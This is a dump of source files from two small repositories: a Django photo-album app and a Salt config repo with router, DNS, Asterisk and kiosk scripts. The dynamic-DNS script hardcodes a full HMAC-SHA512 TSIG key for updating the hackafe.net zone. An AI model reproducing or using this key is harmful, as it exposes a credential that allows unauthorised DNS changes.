= _2 + [(i, 60) for i in range(60, 521, 20)] + [(i, 520) for i in range(60, 521, 20)]\r\nlevels.append(_4)\r\n\r\n_5 = _4 + [(100, i) for i in range(100, 481, 20)] + [(480, i) for i in range(100, 481, 20)]\r\nlevels.append(_5)\r\n\r\n_6 = random_level(40)\r\nlevels.append(_6)\r\n\r\n_7 = []\r\n\r\nif __name__ == '__main__':\r\n for lvl in levels:\r\n print(lvl)\r\n" } ]
3
PaulinaLach/wicky
https://github.com/PaulinaLach/wicky
56a45085fc3ca7355d54ed79cf43ed3a8b8cb110
ac4bffb58b12becac5a1c979b113a13019d6ce8a
8cbd5aadcc0d3e97db2d4311d88ad2d9a4402ef7
refs/heads/master
2020-04-02T00:52:10.602025
2014-12-16T23:26:08
2014-12-16T23:26:08
25,225,460
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.5652173757553101, "alphanum_fraction": 0.5652173757553101, "avg_line_length": 22, "blob_id": "7b3f54f54d3e689f9a927960e13d9ac1765acaff", "content_id": "c1d0c158841b937321010ddb66b945be81b5a9ac", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 23, "license_type": "no_license", "max_line_length": 22, "num_lines": 1, "path": "/main/__init__.py", "repo_name": "PaulinaLach/wicky", "src_encoding": "UTF-8", "text": "__author__ = 'paulina'\n" }, { "alpha_fraction": 0.6889116764068604, "alphanum_fraction": 0.6960985660552979, "avg_line_length": 29.46875, "blob_id": "08fbb219dffb75c6906c1ef955022088f617410b", "content_id": "67d1fad9a15a8b68d8b12ba0069e037845eb70e8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 974, "license_type": "no_license", "max_line_length": 75, "num_lines": 32, "path": "/main/models.py", "repo_name": "PaulinaLach/wicky", "src_encoding": "UTF-8", "text": "from django.db import models\nfrom django.conf import settings\n\nclass Category(models.Model):\n name = models.CharField(max_length=20)\n\n def __str__(self):\n return self.name\n\nclass Album(models.Model):\n name = models.CharField(max_length=20)\n user = models.ForeignKey(settings.AUTH_USER_MODEL)\n\n def __str__(self):\n return self.name\n\nclass Photograph(models.Model):\n name = models.CharField(max_length=100)\n data = models.ImageField(upload_to='images/photos/')\n comment = models.TextField(blank=True)\n latitude = models.FloatField(blank=True)\n longitude = models.FloatField(blank=True)\n creation_date = models.DateTimeField(auto_now_add=True, editable=False)\n user = models.ForeignKey(settings.AUTH_USER_MODEL)\n category = models.ForeignKey(Category, blank=True)\n albums = models.ManyToManyField(Album, blank=True)\n\n def __str__(self):\n return self.name\n\n class Meta:\n get_latest_by = 'creation_date'" }, { "alpha_fraction": 0.5049954652786255, "alphanum_fraction": 0.5086285471916199, "avg_line_length": 33.9523811340332, "blob_id": "254714090cd815dbd6f4f3dd2c248552928fd882", "content_id": "e2f082c640b311ddaad4ac0036f06dac6e9bcd9e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2202, "license_type": "no_license", "max_line_length": 114, "num_lines": 63, "path": "/main/migrations/0001_initial.py", "repo_name": "PaulinaLach/wicky", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Album',\n fields=[\n ('id', models.AutoField(serialize=False, auto_created=True, verbose_name='ID', primary_key=True)),\n ('name', models.CharField(max_length=20)),\n ('user', models.ForeignKey(to=settings.AUTH_USER_MODEL)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Category',\n fields=[\n ('id', models.AutoField(serialize=False, auto_created=True, verbose_name='ID', primary_key=True)),\n ('name', models.CharField(max_length=20)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Photograph',\n fields=[\n ('id', models.AutoField(serialize=False, auto_created=True, verbose_name='ID', primary_key=True)),\n ('name', models.CharField(max_length=100)),\n 
('data', models.ImageField(upload_to='')),\n ('comment', models.TextField()),\n ('latitude', models.FloatField()),\n ('longitude', models.FloatField()),\n ('albums', models.ManyToManyField(to='main.Album')),\n ('category', models.ForeignKey(to='main.Category')),\n ('user', models.ForeignKey(to=settings.AUTH_USER_MODEL)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='UserProfile',\n fields=[\n ('id', models.AutoField(serialize=False, auto_created=True, verbose_name='ID', primary_key=True)),\n ],\n options={\n 'db_table': 'user_profile',\n },\n bases=(models.Model,),\n ),\n ]\n" }, { "alpha_fraction": 0.6833541989326477, "alphanum_fraction": 0.6833541989326477, "avg_line_length": 60.42307662963867, "blob_id": "6223109daad73031e747d5bc2b9c11ada27c2bb9", "content_id": "4b54d6328c5147124c1077834e076bffe988a3ad", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1598, "license_type": "no_license", "max_line_length": 243, "num_lines": 26, "path": "/main/urls.py", "repo_name": "PaulinaLach/wicky", "src_encoding": "UTF-8", "text": "from django.conf.urls import patterns, url\nfrom .views import CategoryIndex, CategoryCreate, CategoryShow, CategoryUpdate, CategoryDelete, AlbumIndex, AlbumCreate, AlbumShow, AlbumUpdate, AlbumDelete, PhotographIndex, PhotographCreate, PhotographShow, PhotographUpdate, PhotographDelete\n\nurlpatterns = patterns('',\n url(r'^categories/$', CategoryIndex.as_view(), name='category_index'),\n url(r'^categories/create/$', CategoryCreate.as_view(), name='category_create'),\n url(r'^categories/(?P<pk>\\d+)/$', CategoryShow.as_view(), name='category_show'),\n url(r'^categories/(?P<pk>\\d+)/update$', CategoryUpdate.as_view(), name='category_update'),\n url(r'^categories/(?P<pk>\\d+)/delete', CategoryDelete.as_view(), name='category_delete'),\n\n\n url(r'^albums/$', AlbumIndex.as_view(), name='album_index'),\n url(r'^albums/create/$', AlbumCreate.as_view(), name='album_create'),\n url(r'^albums/(?P<pk>\\d+)/$', AlbumShow.as_view(), name='album_show'),\n url(r'^albums/(?P<pk>\\d+)/update$', AlbumUpdate.as_view(), name='album_update'),\n url(r'^albums/(?P<pk>\\d+)/delete', AlbumDelete.as_view(), name='album_delete'),\n\n\n url(r'^photographs/$', PhotographIndex.as_view(), name='photograph_index'),\n url(r'^photographs/create/$', PhotographCreate.as_view(), name='photograph_create'),\n url(r'^photographs/(?P<pk>\\d+)/$', PhotographShow.as_view(), name='photograph_show'),\n url(r'^photographs/(?P<pk>\\d+)/update$', PhotographUpdate.as_view(), name='photograph_update'),\n url(r'^photographs/(?P<pk>\\d+)/delete', PhotographDelete.as_view(), name='photograph_delete'),\n\n\n)\n\n" }, { "alpha_fraction": 0.8333333134651184, "alphanum_fraction": 0.8333333134651184, "avg_line_length": 28.16666603088379, "blob_id": "5ed2a0b0d3d114ce8287c8b375b692d5945beca5", "content_id": "354ccd5d646e78f847cc4c242f38375aebe91ae2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 174, "license_type": "no_license", "max_line_length": 51, "num_lines": 6, "path": "/main/admin.py", "repo_name": "PaulinaLach/wicky", "src_encoding": "UTF-8", "text": "from django.contrib import admin\nfrom main.models import Category, Album, Photograph\n\nadmin.site.register(Category)\nadmin.site.register(Album)\nadmin.site.register(Photograph)" }, { "alpha_fraction": 0.5491419434547424, "alphanum_fraction": 0.588143527507782, "avg_line_length": 24.639999389648438, "blob_id": 
"1ae48b61ae79850471c8931f236264098ad787ef", "content_id": "6a9632c05886643c1ef5926c339afe9be10debaa", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 641, "license_type": "no_license", "max_line_length": 95, "num_lines": 25, "path": "/main/migrations/0011_auto_20141025_1845.py", "repo_name": "PaulinaLach/wicky", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport datetime\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('main', '0010_auto_20141025_1341'),\n ]\n\n operations = [\n migrations.AlterModelOptions(\n name='photograph',\n options={'get_latest_by': 'creation_date'},\n ),\n migrations.AddField(\n model_name='photograph',\n name='creation_date',\n field=models.DateTimeField(default=datetime.date(2014, 10, 25), auto_now_add=True),\n preserve_default=False,\n ),\n ]\n" }, { "alpha_fraction": 0.7094188332557678, "alphanum_fraction": 0.7134268283843994, "avg_line_length": 30.25, "blob_id": "f9b7f0fbbdb6aa86f73eab0a907fe0b13dd27c3e", "content_id": "ee32bbbbf462520680b18d4c8f46c1101318e08b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 499, "license_type": "no_license", "max_line_length": 88, "num_lines": 16, "path": "/user_account/models.py", "repo_name": "PaulinaLach/wicky", "src_encoding": "UTF-8", "text": "from django.db import models\nfrom django.contrib.auth.models import AbstractUser\nMALE = 'male'\nFEMALE = 'female'\ngenders = (\n (MALE, 'Male'),\n (FEMALE, 'Female'),\n)\n\nclass UserAccount(AbstractUser):\n age = models.PositiveIntegerField(null=True, blank=True)\n gender = models.CharField(choices=genders, default=MALE, max_length=20, blank=False)\n avatar = models.ImageField(upload_to='images/avatar/', blank=True)\n about = models.TextField(blank=True)\n\n REQUIRED_FIELDS = [\"email\"]" }, { "alpha_fraction": 0.8214285969734192, "alphanum_fraction": 0.8571428656578064, "avg_line_length": 13.166666984558105, "blob_id": "6142f10c64469702e8189ae4ff2459ae85091376", "content_id": "d846f6e8419e1b2011835fdc2cb47e68599f8111", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 84, "license_type": "no_license", "max_line_length": 17, "num_lines": 6, "path": "/requirements.txt", "repo_name": "PaulinaLach/wicky", "src_encoding": "UTF-8", "text": "Django==1.7\ndjango-bootstrap3\ndjango-allauth\nPillow\ndjango_compressor\ndjango-libsass" }, { "alpha_fraction": 0.6820083856582642, "alphanum_fraction": 0.6820083856582642, "avg_line_length": 33.28571319580078, "blob_id": "03fe185533f91098b2ab5b6f5094501895e86785", "content_id": "c68094b8634684d238bd418c5e92c0e8f879892a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 239, "license_type": "no_license", "max_line_length": 83, "num_lines": 7, "path": "/user_account/urls.py", "repo_name": "PaulinaLach/wicky", "src_encoding": "UTF-8", "text": "from django.conf.urls import patterns, include, url\nfrom django.contrib import admin\n\nurlpatterns = patterns('',\n url(r'^', include(admin.site.urls)),\n url(r'^(?P<username>\\w+)/$', 'user_account.views.user_show', name='user_show'),\n)" }, { "alpha_fraction": 0.8545454740524292, "alphanum_fraction": 0.8545454740524292, "avg_line_length": 26.75, "blob_id": "ed0f9f334f94b13749b31543db1f39eafb6a2b70", "content_id": "11e38053ad5f1af1ceaf8c64f53e4cb4a76f0d7a", 
"detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 110, "license_type": "no_license", "max_line_length": 43, "num_lines": 4, "path": "/user_account/admin.py", "repo_name": "PaulinaLach/wicky", "src_encoding": "UTF-8", "text": "from django.contrib import admin\nfrom user_account.models import UserAccount\n\nadmin.site.register(UserAccount)" }, { "alpha_fraction": 0.7160493731498718, "alphanum_fraction": 0.7160493731498718, "avg_line_length": 22.285715103149414, "blob_id": "c7c2d2b3a07e9508ec9c4a3b7a3ca01f8678cbbf", "content_id": "d0af3018d6eb739e9c7b6d20d5e3c76dd4ab44ad", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 162, "license_type": "no_license", "max_line_length": 39, "num_lines": 7, "path": "/user_account/templatetags/app_filters.py", "repo_name": "PaulinaLach/wicky", "src_encoding": "UTF-8", "text": "from django import template\n\nregister = template.Library()\n\n@register.filter(name='name')\ndef name(first_name, last_name):\n return first_name + \" \" + last_name" }, { "alpha_fraction": 0.50656658411026, "alphanum_fraction": 0.5384615659713745, "avg_line_length": 21.20833396911621, "blob_id": "2d7f5cc9d799866af0ca653195b7d7097062b2d5", "content_id": "695f732d02b0b87434e2a661256b793791985e80", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 533, "license_type": "no_license", "max_line_length": 44, "num_lines": 24, "path": "/main/migrations/0010_auto_20141025_1341.py", "repo_name": "PaulinaLach/wicky", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('main', '0009_auto_20141025_1340'),\n ]\n\n operations = [\n migrations.RenameField(\n model_name='album',\n old_name='user_account',\n new_name='user',\n ),\n migrations.RenameField(\n model_name='photograph',\n old_name='user_account',\n new_name='user',\n ),\n ]\n" }, { "alpha_fraction": 0.5439189076423645, "alphanum_fraction": 0.5726351141929626, "avg_line_length": 23.66666603088379, "blob_id": "c3ac522bcb004a61ded198b89d41b84124a89988", "content_id": "e1ca426f696e096be955c1df41d8378d172b362d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 592, "license_type": "no_license", "max_line_length": 76, "num_lines": 24, "path": "/user_account/migrations/0003_auto_20141025_1327.py", "repo_name": "PaulinaLach/wicky", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('user_account', '0002_auto_20141025_1325'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='useraccount',\n name='about',\n field=models.TextField(blank=True),\n ),\n migrations.AlterField(\n model_name='useraccount',\n name='avatar',\n field=models.ImageField(blank=True, upload_to='images/avatar/'),\n ),\n ]\n" }, { "alpha_fraction": 0.6376582384109497, "alphanum_fraction": 0.6376582384109497, "avg_line_length": 44.14285659790039, "blob_id": "1ba42dbc685a0948f51b807bde772088bb99ad59", "content_id": "e9e9cd8f356d7d198438c916eca52e85274c87fe", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 632, "license_type": "no_license", "max_line_length": 110, "num_lines": 14, 
"path": "/wicky/urls.py", "repo_name": "PaulinaLach/wicky", "src_encoding": "UTF-8", "text": "from django.conf.urls import patterns, include, url\nfrom wicky.settings import IMAGE_ROOT\nfrom django.contrib import admin\n\nurlpatterns = patterns('',\n url(r'^$', 'main.views.home', name='home'),\n # url(r'^blog/', include('blog.urls')),\n url(r'^main/', include('main.urls')),\n url(r'^admin/', include(admin.site.urls)),\n url(r'^accounts/logout/$', 'django.contrib.auth.views.logout', {'next_page': '/'}),\n url(r'^accounts/', include('allauth.urls')),\n url(r'^user/', include('user_account.urls')),\n url(r'^images/(?P<path>.*)$', 'django.views.static.serve', {'document_root': IMAGE_ROOT}, name=\"images\"),\n)\n" }, { "alpha_fraction": 0.6816005706787109, "alphanum_fraction": 0.6816005706787109, "avg_line_length": 24.657894134521484, "blob_id": "e0023f43c103da6a85f3867c70961aa1f0287785", "content_id": "e4445e3068c8d66f76b950039b3448cb1d2cea20", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2924, "license_type": "no_license", "max_line_length": 101, "num_lines": 114, "path": "/main/views.py", "repo_name": "PaulinaLach/wicky", "src_encoding": "UTF-8", "text": "__author__ = 'paulina'\n\nfrom django.shortcuts import render\nfrom django.views.generic import ListView, CreateView, DetailView, UpdateView, DeleteView\nfrom .models import Photograph, Album, Category\nfrom django.contrib import messages\n\ncategory_field = ['name']\nalbum_field = ['name', 'user']\nphotograph_field = ['name', 'data', 'comment', 'latitude', 'longitude', 'user', 'category', 'albums']\n\ndef home(request):\n return render(request, 'home.html')\n\nclass CategoryIndex(ListView):\n model = Category\n\nclass CategoryCreate(CreateView):\n model = Category\n success_url = '/'\n fields = category_field\n\n def get_success_url(self):\n messages.success(self.request, 'Category successfully created')\n return super().get_success_url()\n\n\nclass CategoryShow(DetailView):\n model = Category\n\nclass CategoryUpdate(UpdateView):\n model = Category\n success_url = '/'\n fields = category_field\n\n def get_success_url(self):\n messages.success(self.request, 'Category successfully updated')\n return super().get_success_url()\n\nclass CategoryDelete(DeleteView):\n model = Category\n success_url = '/'\n\n def get_success_url(self):\n messages.success(self.request, 'Category successfully deleted')\n return super().get_success_url()\n\n\n\nclass AlbumIndex(ListView):\n model = Album\n\nclass AlbumCreate(CreateView):\n model = Album\n success_url = '/'\n fields = album_field\n\n def get_success_url(self):\n messages.success(self.request, 'Album successfully created')\n return super().get_success_url()\n\nclass AlbumShow(DetailView):\n model = Album\n\nclass AlbumUpdate(UpdateView):\n model = Album\n success_url = '/'\n fields = album_field\n\n def get_success_url(self):\n messages.success(self.request, 'Album successfully updated')\n return super().get_success_url()\n\nclass AlbumDelete(DeleteView):\n model = Album\n success_url = '/'\n\n def get_success_url(self):\n messages.success(self.request, 'Album successfully deleted')\n return super().get_success_url()\n\n\n\nclass PhotographIndex(ListView):\n model = Photograph\n\nclass PhotographCreate(CreateView):\n model = Photograph\n success_url = '/'\n fields = photograph_field\n\n def get_success_url(self):\n messages.success(self.request, 'Photo successfully created')\n return super().get_success_url()\n\nclass 
PhotographShow(DetailView):\n model = Photograph\n\nclass PhotographUpdate(UpdateView):\n model = Photograph\n success_url = '/'\n fields = photograph_field\n\n def get_success_url(self):\n messages.success(self.request, 'Photo successfully updated')\n return super().get_success_url()\n\nclass PhotographDelete(DeleteView):\n model = Photograph\n success_url = '/'\n\n def get_success_url(self):\n messages.success(self.request, 'Photo successfully deleted')\n return super().get_success_url()" }, { "alpha_fraction": 0.531775712966919, "alphanum_fraction": 0.5476635694503784, "avg_line_length": 26.435897827148438, "blob_id": "3ffd5077a2d4f58480bdd2888342c6b75d321f52", "content_id": "7f7066bfe622d37c01864a8be8ef0a95e7d05371", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1070, "license_type": "no_license", "max_line_length": 70, "num_lines": 39, "path": "/main/migrations/0012_auto_20141027_0030.py", "repo_name": "PaulinaLach/wicky", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('main', '0011_auto_20141025_1845'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='photograph',\n name='albums',\n field=models.ManyToManyField(to='main.Album', blank=True),\n ),\n migrations.AlterField(\n model_name='photograph',\n name='category',\n field=models.ForeignKey(blank=True, to='main.Category'),\n ),\n migrations.AlterField(\n model_name='photograph',\n name='comment',\n field=models.TextField(blank=True),\n ),\n migrations.AlterField(\n model_name='photograph',\n name='latitude',\n field=models.FloatField(blank=True),\n ),\n migrations.AlterField(\n model_name='photograph',\n name='longitude',\n field=models.FloatField(blank=True),\n ),\n ]\n" }, { "alpha_fraction": 0.5833333134651184, "alphanum_fraction": 0.5833333134651184, "avg_line_length": 23, "blob_id": "a31960517c5542156f8459cb607c20b642fd0682", "content_id": "2a824cd3d3b54dfc067c354d4e0134d5ddf7d1f9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 24, "license_type": "no_license", "max_line_length": 23, "num_lines": 1, "path": "/user_account/__init__.py", "repo_name": "PaulinaLach/wicky", "src_encoding": "UTF-8", "text": "__author__ = 'kruczjak'\n" }, { "alpha_fraction": 0.7175284028053284, "alphanum_fraction": 0.7200504541397095, "avg_line_length": 36.71428680419922, "blob_id": "7d33177ed9fb12a377ab30ca482360ea2a8322ea", "content_id": "d6c96ec33b83fddf90e79e68bf4063321804bdf2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 793, "license_type": "no_license", "max_line_length": 89, "num_lines": 21, "path": "/user_account/views.py", "repo_name": "PaulinaLach/wicky", "src_encoding": "UTF-8", "text": "from django.dispatch import receiver\nfrom allauth.account.signals import user_signed_up\nfrom django.shortcuts import render\nfrom user_account.models import UserAccount\nfrom main.models import Photograph\n\n@receiver(user_signed_up)\ndef set_gender(sender, **kwargs):\n user = kwargs.pop('user')\n # extra_data = user.socialaccount_set.filter(provider='facebook')[0].extra_data\n # gender = extra_data['gender']\n\n # if gender == 'male': # because the default is female.\n # user.gender = 'male'\n\n user.save()\n\ndef user_show(request, username):\n user = UserAccount.objects.filter(username=username)\n 
photographs = Photograph.objects.filter(user=user).order_by('-creation_date')[:5]\n return render(request, 'user_account/show.html', {user: user, 'photos': photographs})\n\n" } ]
18
jabodrom/Project
https://github.com/jabodrom/Project
8a5b30f419482b6d2b8af52ded6f608ae30d8564
a1da6bdb311729909b6032a9703369df5e4e34ba
c6a56f92f7dfe5765a05699e4b7020d51e19a4e9
refs/heads/master
2021-01-01T18:41:57.553825
2015-05-13T08:45:10
2015-05-13T08:45:10
35,538,906
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6638655662536621, "alphanum_fraction": 0.6694678068161011, "avg_line_length": 17.736841201782227, "blob_id": "3f13ea96feaf0b2cd687e2e6032536569a041ac7", "content_id": "b87d9eca2cc705bd191ce4d5a91244e7fe31e135", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 369, "license_type": "no_license", "max_line_length": 49, "num_lines": 19, "path": "/myfiles.py", "repo_name": "jabodrom/Project", "src_encoding": "UTF-8", "text": "import os\n\nfor f in os.listdir(\"/Users/Полина_2/Downloads\"):\n print(f)\n\nprint(os.getcwd())\n\nos.chdir(\"/Users/Полина_2/Downloads\")\nprint(os.getcwd())\n\nprint(os.getenv(\"HOMEPATH\",\"it is Windows\"))\nprint(os.getcwd())\nmy_home = os.getenv(\"HOMEPATH\")\nfor f in os.listdir(my_home):\n print(f)\n\nos.chdir(my_home)\nfor f in os.listdir(\"Dropbox\"):\n print(f)\n\n" } ]
1
umbc-hackafe/salt-rules
https://github.com/umbc-hackafe/salt-rules
bc0f2babfd9d04325fd25e270396b049d5df8094
291d7986af930e2a55023fbc684a01468c66e8d3
d7bca9dc017ad2900a4241a642ec524baa9c3472
refs/heads/master
2020-05-21T13:43:49.726371
2018-03-12T04:32:32
2018-03-12T04:32:32
53,908,083
1
1
null
null
null
null
null
[ { "alpha_fraction": 0.6283618807792664, "alphanum_fraction": 0.694376528263092, "avg_line_length": 18.4761905670166, "blob_id": "86a63425387fca72949305f96969c5e8e304620c", "content_id": "06abb1ee3225b92a3a5735b70f90a843b1936f10", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 409, "license_type": "no_license", "max_line_length": 54, "num_lines": 21, "path": "/router/bind/dyndns", "repo_name": "umbc-hackafe/salt-rules", "src_encoding": "UTF-8", "text": "#!/usr/bin/bash\n## Static\n#IPV4=\"192.168.0.2\"\n#IPV6=\"2001:db8::dead:beaf\"\n## Or dynamic:\nIPV4=$(curl -s \"http://v4.ipv6-test.com/api/myip.php\")\nIPV6=$(curl -s 'http://v6.ipv6-test.com/api/myip.php')\n\nKEY=+m1tZ3f0QoByOOnRDLTy20muCyNlMZMhIBIuKsd4eQm03xgFVbaFhLQmDBXU3+iTj+e5gqcEXULo4nz6Ifv2AQ==\nNS=vegafive.hackafe.net\nDOMAIN=hackafe.net.\nZONE=hackafe.net\n\nnsupdate -y hmac-sha512:dyndns:$KEY -v << EOF\nserver $NS\nzone $ZONE\nupdate delete $DOMAIN A\nupdate add $DOMAIN 30 A $IPV4\nshow\nsend\nEOF\n" }, { "alpha_fraction": 0.5930018424987793, "alphanum_fraction": 0.6335175037384033, "avg_line_length": 27.578947067260742, "blob_id": "e374aa62e423a31f667aa2503f11284c1d12a9f9", "content_id": "8542648cfa9c939376b3b148e36c0fa7cbcbc827", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 543, "license_type": "no_license", "max_line_length": 86, "num_lines": 19, "path": "/asterisk/scripts/super-alarm.py", "repo_name": "umbc-hackafe/salt-rules", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\nimport random\nimport sign\nimport sys\nimport os\n\nif len(sys.argv) <= 1:\n print(\"Usage: {} {} {}\".format(sys.argv[0], \"<start|finish>\", \"<extension>\"))\n sys.exit()\n\ndisplay = sign.Sign(\"dash\", 8800)\n\nif sys.argv[1] == \"start\":\n code = str(random.randrange(10000, 50000))\n print(code)\n display.new_message(code, name=\"super-alarm-\" + sys.argv[2], effects=[\"bounce_x\"])\n os.execlp(\"redial-alarm.sh\", sys.argv[2], code)\nelif sys.argv[1] == \"finish\":\n display.remove_message(\"super-alarm-\" + sys.argv[2])\n" }, { "alpha_fraction": 0.5588235259056091, "alphanum_fraction": 0.5588235259056091, "avg_line_length": 16, "blob_id": "071f84e8ecd46a0a769834e00ee145f5dafdb546", "content_id": "5f4d2923276f7059bdb3dda19826ca107177a8d8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 68, "license_type": "no_license", "max_line_length": 33, "num_lines": 4, "path": "/homeautomation/car/bash_profile", "repo_name": "umbc-hackafe/salt-rules", "src_encoding": "UTF-8", "text": "[[ -f ~/.bashrc ]] && . ~/.bashrc\n\n\nwhile true; do blueplayer; done\n" }, { "alpha_fraction": 0.6089743375778198, "alphanum_fraction": 0.6282051205635071, "avg_line_length": 30.200000762939453, "blob_id": "943d8ba1f32eef2e7adfee099b5c7f9bed31c28d", "content_id": "c1d7667954d2f71ec23388bf5b1c58f0c212bd30", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 156, "license_type": "no_license", "max_line_length": 81, "num_lines": 5, "path": "/homeautomation/sign/bash_profile", "repo_name": "umbc-hackafe/salt-rules", "src_encoding": "UTF-8", "text": "[[ -f ~/.bashrc ]] && . 
~/.bashrc\nsudo git -C /opt/sign pull\nsleep 3\nip a\nwhile true; do sudo /opt/sign/python/play.py -g board 2>~/.err_log; sleep 5; done\n" }, { "alpha_fraction": 0.5324384570121765, "alphanum_fraction": 0.7002236843109131, "avg_line_length": 73.33333587646484, "blob_id": "b3ebd35a7c9061518df6f5f80f98eef200d95970", "content_id": "3afab455e2bd6729303a4724ec40c5930227aba7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 447, "license_type": "no_license", "max_line_length": 105, "num_lines": 6, "path": "/router/forwarding/enableforwarding", "repo_name": "umbc-hackafe/salt-rules", "src_encoding": "UTF-8", "text": "#!/usr/bin/bash\n/usr/bin/iptables -t nat -A POSTROUTING -o enp0s18.4000 -j MASQUERADE\n/usr/bin/echo 1 > /proc/sys/net/ipv4/ip_forward\n/usr/bin/iptables -A PREROUTING -t nat -i enp0s18.4000 -p tcp --dport 80 -j DNAT --to 192.168.2.42:80\n/usr/bin/iptables -A PREROUTING -t nat -i enp0s18.4000 -p tcp --dport 8090 -j DNAT --to 192.168.2.42:8090\n/usr/bin/iptables -A PREROUTING -t nat -i enp0s18.4000 -p tcp --dport 443 -j DNAT --to 192.168.2.42:443\n\n" }, { "alpha_fraction": 0.5833333134651184, "alphanum_fraction": 0.6203703880310059, "avg_line_length": 53, "blob_id": "e20fc9034fe80d36762eaffb29da4caf35194c00", "content_id": "87b5b32085d06ed53e12c48f716ce9f804e364d8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 108, "license_type": "no_license", "max_line_length": 95, "num_lines": 2, "path": "/asterisk/scripts/redial-alarm.sh", "repo_name": "umbc-hackafe/salt-rules", "src_encoding": "UTF-8", "text": "#!/bin/bash\n( sleep 0; /usr/bin/make-call-context \"$1\" super-alarm start \"ARRAY(TARGET,CODE)\" \"$1\\\\,$2\" ) &\n" }, { "alpha_fraction": 0.4979948401451111, "alphanum_fraction": 0.5083070993423462, "avg_line_length": 33.90999984741211, "blob_id": "0d62ff7ecde40a142212b6502793d71bf5965860", "content_id": "46e9dcf1f5d14fb78da7511dfda52ab0089002ef", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6982, "license_type": "no_license", "max_line_length": 231, "num_lines": 200, "path": "/isumbcopen/updater.py", "repo_name": "umbc-hackafe/salt-rules", "src_encoding": "UTF-8", "text": "#!/usr/bin/python3\nfrom bs4 import BeautifulSoup\nimport re\nfrom dateutil.parser import parse as dateparse\nimport datetime\nimport sys\nimport fileinput\nimport requests\n\ndebugging = False\nusefile = False\nusestdin = False\n\nargs = set(sys.argv)\n\ndef debug(string, *args, **kwargs):\n if debugging:\n print(str(string).format(*args, **kwargs))\n\nif \"debug\" in args:\n debugging = True\n\nif \"-\" in args:\n usestdin = True\n\nfor arg in args:\n if arg.startswith(\"file=\"):\n usefile = arg[5:]\n debugging = True\n\ndays = [w+\"day\" for w in [\"mon\", \"tues\", \"wednes\", \"thurs\", \"fri\", \"satur\", \"sun\"]]\nmonths = [\"january\", \"february\", \"march\", \"april\", \"may\", \"june\", \"july\", \"august\", \"september\", \"october\", \"november\", \"december\"]\nmonths.extend([m[:3] for m in months])\ndays.extend([w[:3] for w in days])\n\nif usestdin:\n myumbc = \"\"\n for line in fileinput.input():\n myumbc += line.lower()\n banners = [myumbc]\nelif usefile:\n with open(usefile) as f:\n myumbc = f.read().lower()\n banners = [myumbc]\nelse:\n try:\n req = requests.get(\"http://my.umbc.edu/discussions/14777\", headers={\"User-agent\": \"Chrome\"})\n except:\n exit(1)\n\n if not req.ok:\n exit(1)\n\n myumbc = req.text\n soup 
